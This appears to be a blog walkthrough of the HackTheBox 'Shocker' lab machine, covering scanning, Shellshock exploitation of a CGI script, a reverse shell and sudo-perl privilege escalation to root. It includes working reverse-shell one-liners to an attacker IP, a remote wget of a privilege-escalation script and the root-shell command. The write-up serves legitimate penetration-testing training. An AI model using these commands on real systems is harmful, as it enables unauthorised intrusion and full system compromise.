shocker

Dec 10, 2020 TJNull's List
Share on:

shocker

Introduction:

Recon

root@kinetic:…/hackthebox/shocker/data# nmap -sS -sC -sV -T4 -Pn -O -oN nmap.shocker.txt 10.10.10.56 Host discovery disabled (-Pn). All addresses will be marked ‘up’ and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-23 21:15 EST Nmap scan report for 10.10.10.56 Host is up (0.016s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |http-title: Site doesn’t have a title (text/html). 2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA) | 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA) | 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519) Aggressive OS guesses: Linux 3.12 (95%), Linux 3.13 (95%), Linux 3.16 (95%), Linux 3.18 (95%), Linux 3.2 - 4.9 (95%), Linux 3.8 - 3.11 (95%), Linux 4.8 (95%), Linux 4.4 (95%), Linux 4.9 (95%), Linux 4.2 (95%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 19.23 seconds

Port Scanner -

Port 80 is open Port 2222 is open Port scan completed in 0:00:41.872386

(py3) eneloop@kinetic:/oscp/tools/threader3000$ nikto -url http://10.10.10.56

  • Nikto v2.1.6
  • Target IP: 10.10.10.56
  • Target Hostname: 10.10.10.56
  • Target Port: 80
  • Start Time: 2021-01-23 21:17:38 (GMT-5)
  • Server: Apache/2.4.18 (Ubuntu)
  • The anti-clickjacking X-Frame-Options header is not present.
  • The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  • The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  • Server may leak inodes via ETags, header found with file /, inode: 89, size: 559ccac257884, mtime: gzip
  • Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
  • Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
  • OSVDB-3233: /icons/README: Apache default file found.
  • 8673 requests: 0 error(s) and 7 item(s) reported on remote host
  • End Time: 2021-01-23 21:21:19 (GMT-5) (221 seconds)
  • 1 host(s) tested

dirb/ dirbuster/ eneloop@kinetic:/oscp/tools/threader3000$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://shocker.htb -x php,conf,cfg -t 24

Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@FireFart)

[+] Url: http://shocker.htb [+] Threads: 24 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Extensions: php,conf,cfg [+] Timeout: 10s

2021/01/23 21:26:12 Starting gobuster

/server-status (Status: 403)

2021/01/23 21:39:20 Finished

Enumeration

Exploitation

https://raw.githubusercontent.com/nccgroup/shocker/master/shocker.py

 1(py2) eneloop@kinetic:.../hackthebox/shocker/data$ ./shocker.py  -H shocker.htb --cgi=/cgi-bin/user.sh
 2
 3   .-. .            .            
 4  (   )|            |            
 5   `-. |--. .-.  .-.|.-. .-. .--.
 6  (   )|  |(   )(   |-.'(.-' |   
 7   `-' '  `-`-'  `-''  `-`--''  v1.1 
 8   
 9 Tom Watson, [email protected]
10 https://www.github.com/nccgroup/shocker
11     
12 Released under the GNU Affero General Public License
13 (https://www.gnu.org/licenses/agpl-3.0.html)
14    
15    
16[+] Single target '/cgi-bin/user.sh' being used
17[+] Checking connectivity with target...
18[+] Target was reachable
19[+] Looking for vulnerabilities on shocker.htb:80
20[+] 1 potential target found, attempting exploits
21[+] The following URLs appear to be exploitable:
22  [1] http://shocker.htb:80/cgi-bin/user.sh
23[+] Would you like to exploit further?
24[>] Enter an URL number or 0 to exit: 1
25[+] Entering interactive mode for http://shocker.htb:80/cgi-bin/user.sh
26[+] Enter commands (e.g. /bin/cat /etc/passwd) or 'quit'
27  > /etc/passwd
28  > No response
29  > date
30  > No response
31  > ls
32  > No response
33
34  > No response
35  > which nc
36  > No response
37  > bash -i >& /dev/tcp/10.10.14.38/4444 0>&1         
38  > No response
39  > /bin/sh -i >& /dev/tcp/10.10.14.38/4444 0>&1
40  > No response
41  >

Post-exploit/PrivEsc

eneloop@kinetic:…/hackthebox/shocker/data$ nc -lvnp 4444 listening on [any] 4444 … connect to [10.10.14.38] from (UNKNOWN) [10.10.10.56] 48750 /bin/sh: 0: can’t access tty; job control turned off $ ls -otr total 4 -rwxr-xr-x 1 root 113 Sep 22 2017 user.sh $ pws /bin/sh: 2: pws: not found $ whoami shelly $ pwd /usr/lib/cgi-bin $ cd
$ ls -l total 4 -rwxr-xr-x 1 root root 113 Sep 22 2017 user.sh $ cd /home $ ls shelly $ cd shelly $ ls user.txt $ cat user.txt c74XXXXXXXXXXXXXXXXXXXXXXXXX7e $ cd /tmp $ ls -l total 8 drwx—— 3 root root 4096 Jan 23 21:23 systemd-private-8d2c29e238904430862a2298afb60a92-systemd-timesyncd.service-A889Ai drwx—— 2 root root 4096 Jan 23 21:23 vmware-root $ wget http://10.10.14.38:8000/linpeas.sh –2021-01-24 10:20:16– http://10.10.14.38:8000/linpeas.sh Connecting to 10.10.14.38:8000… connected. HTTP request sent, awaiting response… 200 OK

====================================( Users Information )===================================== [+] My user [i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#users uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)

[+] Do I have PGP keys? /usr/bin/gpg netpgpkeys Not Found netpgp Not Found

[+] Clipboard or highlighted text? xsel and xclip Not Found

[+] Checking ‘sudo -l’, /etc/sudoers, and /etc/sudoers.d [i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid Matching Defaults entries for shelly on Shocker: env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User shelly may run the following commands on Shocker: (root) NOPASSWD: /usr/bin/perl

https://gtfobins.github.io/gtfobins/perl/

$ sudo perl -e ‘exec “/bin/sh”;’ whoami root cd /root ls root.txt cat root.txt c0XXXXXXXXXXXXXXXXXXXXXXXXXX47

Notes: